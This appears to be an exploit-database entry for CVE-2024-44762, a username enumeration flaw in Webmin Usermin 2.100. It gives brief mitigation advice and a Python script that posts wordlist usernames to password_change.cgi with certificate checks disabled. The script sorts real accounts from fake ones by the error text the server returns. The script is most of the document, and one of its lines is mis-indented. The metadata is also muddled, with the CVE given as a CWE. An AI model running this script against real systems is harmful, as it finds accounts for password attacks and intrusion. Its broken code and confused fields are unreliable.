Webmin Usermin 2.100 - Username Enumeration

vendor:

Webmin Usermin

by:

Kjesper

3.1

CVSS

MEDIUM

Username Enumeration

200

CWE

Product Name: Webmin Usermin

Affected Version From: <= 2.100

Affected Version To: 2.1

Patch Exists: NO

Related CWE: CVE-2024-44762

CPE: a:webmin:usermin:2.100

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux

2024

Webmin Usermin 2.100 – Username Enumeration

The exploit allows an attacker to enumerate valid usernames on Webmin Usermin version 2.100. By sending requests to the password change endpoint with different usernames, the attacker can identify existing user accounts based on the server's responses.

Mitigation:

To mitigate this vulnerability, it is recommended to implement account lockout mechanisms, use multi-factor authentication, and regularly monitor and review user account activities.

Source

Exploit-DB raw data:

# Exploit Title: Webmin Usermin 2.100 - Username Enumeration
# Date: 10.02.2024 
# Exploit Author: Kjesper 
# Vendor Homepage: https://www.webmin.com/usermin.html
# Software Link: https://github.com/webmin/usermin
# Version: <= 2.100 
# Tested on: Kali Linux 
# CVE: CVE-2024-44762
# https://senscybersecurity.nl/cve-2024-44762-explained/ 

#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Usermin - Username Enumeration (Version 2.100) 
# Usage: UserEnumUsermin.py -u HOST -w WORDLIST_USERS
# Example: UserEnumUsermin.py -u https://127.0.0.1:20000 -w users.txt 

import requests
import json
import requests
import argparse
import sys
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

parser = argparse.ArgumentParser()

parser.add_argument("-u", "--url", help = "use -u with the url to the host of usermin, EX: \"-u https://127.0.0.1:20000\"")
parser.add_argument("-w", "--wordlist_users", help = "use -w with the username wordlist, EX: \"-w users.txt\"")

args = parser.parse_args()

if len(sys.argv) != 5:
    print("Please provide the -u for URL and -w for the wordlist containing the usernames")
    print("EX: python3 UsernameEnum.py -u https://127.0.0.1:20000 -w users.txt") 
    exit()
    
usernameFile = open(args.wordlist_users, 'r')

dataUsername = usernameFile.read()
usernameFileIntoList = dataUsername.split("\n")
usernameFile.close()

for i in usernameFileIntoList:

    newHeaders = {'Content-type': 'application/x-www-form-urlencoded', 'Referer': '%s/password_change.cgi' % args.url}
    params = {'user':i, 'pam':'', 'expired':'2', 'old':'fakePassword', 'new1':'password', 'new2':'password'}
    response = requests.post('%s/password_change.cgi' % args.url, data=params, verify=False, headers=newHeaders)
        if "Failed to change password: The current password is incorrect." in response.text:
        print("Possible user found with username: " + i)
    
    if "Failed to change password: Your login name was not found in the password file!" not in response.text and "Failed to change password: The current password is incorrect." not in response.text:
        print("Application is most likely not vulnerable and are therefore quitting.")
        exit() # comment out line 33-35 if you would still like to try username enumeration.